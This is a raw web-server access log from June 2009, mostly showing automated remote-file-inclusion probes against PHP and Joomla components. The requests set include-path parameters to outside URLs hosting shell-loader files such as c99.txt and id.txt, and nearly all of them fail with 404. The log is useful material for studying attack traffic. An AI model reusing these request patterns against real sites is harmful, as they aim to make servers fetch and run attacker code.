211.230.156.161 - - [22/Jun/2009:01:19:29 -0400] "GET /logs/access_log.Q109051700/littleshell.shtm=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 305 "-" "libwww-perl/5.79"
211.230.156.161 - - [22/Jun/2009:01:19:29 -0400] "GET /logs/access_log.Q109051300/littleshell.shtm=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 305 "-" "libwww-perl/5.79"
222.122.179.44 - - [22/Jun/2009:01:19:31 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:01:19:31 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:01:19:31 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:01:19:32 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:01:19:32 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:01:19:32 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:01:20:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.122.179.44 - - [22/Jun/2009:01:20:19 -0400] "GET /logs/access_log.Q109052200/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:01:20:19 -0400] "GET /logs/access_log.Q109052200/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
66.249.71.54 - - [22/Jun/2009:01:20:23 -0400] "GET /logs/error_log.Q108092200 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
201.232.54.48 - - [22/Jun/2009:01:21:51 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:01:21:54 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
82.194.87.219 - - [22/Jun/2009:01:21:59 -0400] "GET /logs//errors.php?error=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 214 "-" "libwww-perl/5.822"
82.194.87.219 - - [22/Jun/2009:01:22:01 -0400] "GET /logs///components/com_simpleboard/image_upload.php?sbp=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 248 "-" "libwww-perl/5.822"
82.194.87.219 - - [22/Jun/2009:01:22:50 -0400] "GET /logs//includes/messages.inc.php?include_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 229 "-" "libwww-perl/5.822"
66.249.71.14 - - [22/Jun/2009:01:22:58 -0400] "GET /images/over-index4_impltmotrs.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
82.194.87.219 - - [22/Jun/2009:01:23:11 -0400] "GET /logs//includes/messages.inc.php?include_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 229 "-" "libwww-perl/5.822"
121.165.73.157 - - [22/Jun/2009:01:23:43 -0400] "GET /logs/access_log.Q109052300/index.php?cont=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.165.73.157 - - [22/Jun/2009:01:23:43 -0400] "GET /index.php?cont=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
121.165.73.157 - - [22/Jun/2009:01:23:43 -0400] "GET /logs/index.php?cont=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
209.59.12.99 - - [22/Jun/2009:01:25:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.165.73.157 - - [22/Jun/2009:01:26:20 -0400] "GET /logs/error_log.Q109051400/index.php?cont=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
208.111.94.201 - - [22/Jun/2009:01:26:38 -0400] "GET //?_PHPLIB[libdir]=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:26:38 -0400] "GET /logs/access_log.Q109050700%20%20//?_PHPLIB[libdir]=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:26:38 -0400] "GET /logs//?_PHPLIB[libdir]=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 200 6515 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:27:37 -0400] "GET /logs/error_log.Q109050700%20%20//?_PHPLIB[libdir]=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.189.224.21 - - [22/Jun/2009:01:27:46 -0400] "GET /logs/littleshell.shtm=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 283 "-" "libwww-perl/5.811"
213.189.224.21 - - [22/Jun/2009:01:27:46 -0400] "GET /littleshell.shtm=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.811"
213.189.224.21 - - [22/Jun/2009:01:27:48 -0400] "GET /logs/access_log.Q109051300/littleshell.shtm=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 305 "-" "libwww-perl/5.811"
213.189.224.21 - - [22/Jun/2009:01:28:35 -0400] "GET /logs/access_log.Q109051700/littleshell.shtm=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 305 "-" "libwww-perl/5.811"
201.232.54.48 - - [22/Jun/2009:01:28:50 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:01:30:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.254.216.47 - - [22/Jun/2009:01:30:15 -0400] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:30:15 -0400] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:30:15 -0400] "GET /logs/access_log.Q109051500//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:30:16 -0400] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:30:16 -0400] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:30:16 -0400] "GET /logs/access_log.Q109051500//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:30:19 -0400] "GET /logs/access_log.Q109051500%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:30:20 -0400] "GET /logs/access_log.Q109051500%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
81.177.9.20 - - [22/Jun/2009:01:30:26 -0400] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
81.177.9.20 - - [22/Jun/2009:01:30:26 -0400] "GET /logs/access_log.Q109051500//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
81.177.9.20 - - [22/Jun/2009:01:30:27 -0400] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
208.116.37.152 - - [22/Jun/2009:01:30:30 -0400] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
208.116.37.152 - - [22/Jun/2009:01:30:30 -0400] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
208.116.37.152 - - [22/Jun/2009:01:30:30 -0400] "GET /logs/access_log.Q109051500//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
208.116.37.152 - - [22/Jun/2009:01:30:31 -0400] "GET /logs/access_log.Q109051500%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:30:33 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:30:34 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
208.116.37.152 - - [22/Jun/2009:01:30:44 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
217.70.32.2 - - [22/Jun/2009:01:30:53 -0400] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
217.70.32.2 - - [22/Jun/2009:01:30:53 -0400] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
217.70.32.2 - - [22/Jun/2009:01:30:53 -0400] "GET /logs/access_log.Q109051500//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
81.177.9.20 - - [22/Jun/2009:01:30:58 -0400] "GET /logs/access_log.Q109061100//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
217.70.32.2 - - [22/Jun/2009:01:31:16 -0400] "GET /logs/access_log.Q109061100//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:01:31:39 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:01:31:39 -0400] "GET /logs/access_log.Q109060100/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:01:31:39 -0400] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:01:31:43 -0400] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:01:31:43 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:01:31:43 -0400] "GET /logs/access_log.Q109060100/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:01:31:48 -0400] "GET /logs/access_log.Q109052400/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:01:31:50 -0400] "GET /logs/access_log.Q109052400/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:32:08 -0400] "GET /logs/access_log.Q109050700//?_PHPLIB[libdir]=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:32:47 -0400] "GET /logs/access_log.Q109061100//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
208.116.37.152 - - [22/Jun/2009:01:32:48 -0400] "GET /logs/access_log.Q109061100//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:32:52 -0400] "GET /logs/access_log.Q109061100//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:33:00 -0400] "GET /logs/error_log.Q109050700//?_PHPLIB[libdir]=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
210.188.236.212 - - [22/Jun/2009:01:33:47 -0400] "GET /index.php?pagina=http://webmail.mst.org.br/bin/c99.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
208.111.94.201 - - [22/Jun/2009:01:33:48 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:33:48 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:33:48 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:33:58 -0400] "GET /logs/error_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
83.103.72.130 - - [22/Jun/2009:01:35:05 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://med.buu.ac.th//components/com_joomlaboard/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
83.103.72.130 - - [22/Jun/2009:01:35:05 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://med.buu.ac.th//components/com_joomlaboard/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:01:35:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.103.72.130 - - [22/Jun/2009:01:35:09 -0400] "GET /logs/phphtml.php?htmlclass_path=http://med.buu.ac.th//components/com_joomlaboard/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.103.72.130 - - [22/Jun/2009:01:35:09 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://med.buu.ac.th//components/com_joomlaboard/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.103.72.130 - - [22/Jun/2009:01:35:09 -0400] "GET /phphtml.php?htmlclass_path=http://med.buu.ac.th//components/com_joomlaboard/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
217.70.32.2 - - [22/Jun/2009:01:35:18 -0400] "GET /logs/error_log.Q109052100%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
217.70.32.2 - - [22/Jun/2009:01:35:27 -0400] "GET /logs/access_log.Q109051500%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:35:57 -0400] "GET //components/com_remository/remository.class.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:35:57 -0400] "GET /logs/access_log.Q109052100//components/com_remository/remository.class.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:35:57 -0400] "GET /logs//components/com_remository/remository.class.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
81.177.9.20 - - [22/Jun/2009:01:37:28 -0400] "GET /logs/access_log.Q109051500%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:37:32 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:37:38 -0400] "GET /logs/error_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
81.177.9.20 - - [22/Jun/2009:01:38:11 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:38:55 -0400] "GET /logs/access_log.Q109052100%20%20//components/com_remository/remository.class.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.103.72.130 - - [22/Jun/2009:01:39:04 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://med.buu.ac.th//components/com_joomlaboard/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
82.194.87.219 - - [22/Jun/2009:01:39:48 -0400] "GET /logs///components/com_simpleboard/image_upload.php?sbp=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 248 "-" "libwww-perl/5.822"
82.194.87.219 - - [22/Jun/2009:01:40:03 -0400] "GET /logs//errors.php?error=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 214 "-" "libwww-perl/5.822"
209.59.12.99 - - [22/Jun/2009:01:40:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.111.94.201 - - [22/Jun/2009:01:40:12 -0400] "GET /logs/access_log.Q109050900%20%20//components/com_remository/remository.class.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.249.71.54 - - [22/Jun/2009:01:40:21 -0400] "GET /images/over-index4_implatmed.jpg HTTP/1.1" 200 1994 "-" "Googlebot-Image/1.0"
218.38.136.16 - - [22/Jun/2009:01:41:33 -0400] "GET /errors.php?error=http://www.peb.com.ua/ua/errore.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
218.38.136.16 - - [22/Jun/2009:01:41:33 -0400] "GET /logs/errors.php?error=http://www.peb.com.ua/ua/errore.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
218.38.136.16 - - [22/Jun/2009:01:41:33 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.peb.com.ua/ua/errore.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
201.232.54.48 - - [22/Jun/2009:01:41:38 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/CHID.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.232.54.48 - - [22/Jun/2009:01:41:38 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/CHID.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
201.232.54.48 - - [22/Jun/2009:01:41:38 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/CHID.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
218.38.136.16 - - [22/Jun/2009:01:42:03 -0400] "GET /logs/access_log.Q109052300/errors.php?error=http://www.peb.com.ua/ua/errore.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
201.232.54.48 - - [22/Jun/2009:01:42:04 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/CHID.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
218.38.136.16 - - [22/Jun/2009:01:42:54 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.peb.com.ua/ua/errore.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
218.38.136.16 - - [22/Jun/2009:01:42:54 -0400] "GET /errors.php?error=http://www.peb.com.ua/ua/errore.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
218.38.136.16 - - [22/Jun/2009:01:42:54 -0400] "GET /logs/errors.php?error=http://www.peb.com.ua/ua/errore.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
218.38.136.16 - - [22/Jun/2009:01:43:32 -0400] "GET /logs/access_log.Q109052300/errors.php?error=http://www.peb.com.ua/ua/errore.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
201.232.54.48 - - [22/Jun/2009:01:44:40 -0400] "GET /logs/error_log.Q109052100%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/CHID.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
209.59.12.99 - - [22/Jun/2009:01:45:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.64.89.139 - - [22/Jun/2009:01:47:01 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:01:47:01 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:01:47:01 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:01:47:10 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:01:47:13 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:01:47:13 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:01:47:13 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:01:47:24 -0400] "GET /logs/error_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:01:47:31 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:01:47:32 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:01:47:38 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:01:47:58 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:01:50:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.15.171.4 - - [22/Jun/2009:01:51:01 -0400] "GET /?sIncPath=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
67.15.171.4 - - [22/Jun/2009:01:51:05 -0400] "GET /logs/access_log.Q109053100%20%20/?sIncPath=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.15.171.4 - - [22/Jun/2009:01:51:05 -0400] "GET /logs/?sIncPath=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
